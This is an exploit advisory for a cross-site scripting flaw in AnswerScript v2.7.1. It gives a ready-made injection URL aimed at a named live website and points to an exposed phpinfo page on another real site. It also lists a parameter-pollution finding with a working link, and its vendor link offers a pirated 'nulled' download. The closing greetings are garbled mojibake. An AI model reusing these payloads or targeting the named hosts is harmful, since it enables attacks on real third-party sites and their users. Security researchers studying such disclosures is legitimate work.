========================================================================
| # Title     : AnswerScript v2.7.1 XSS vulnerability
| # Author    : indoushka
| # email     : indoushka4ever@gmail.com
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version   : v2.7.1
| # Vendor    : http://www.p30vel.ir/wp-content/uploads/AnswerScript_v2.7.1_Nulled_www.P30vel.ir_.zip
| # Dork      : n/a
========================================================================

poc :


http://www.prayzr.com//login?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw%3d%3d%27%22()%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E

php info :

http://www.curso-biomagnetismo.com/biomagnetismo/phpinfo.php

HTTP parameter pollution :

affects /login.php

Attack details :

URL encoded GET input redirect was set to aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596

Parameter precedence: last occurrence

Affected link: http://www.prayzr.com/signup?redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==&n914757=v973596

Affected parameter: redirect=aHR0cDovL3d3dy5wcmF5enIuY29tL2Nzcy8/a2V5PWNzcw==


Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
                                                                       |
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn                   |
                                                                       |
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/  =============================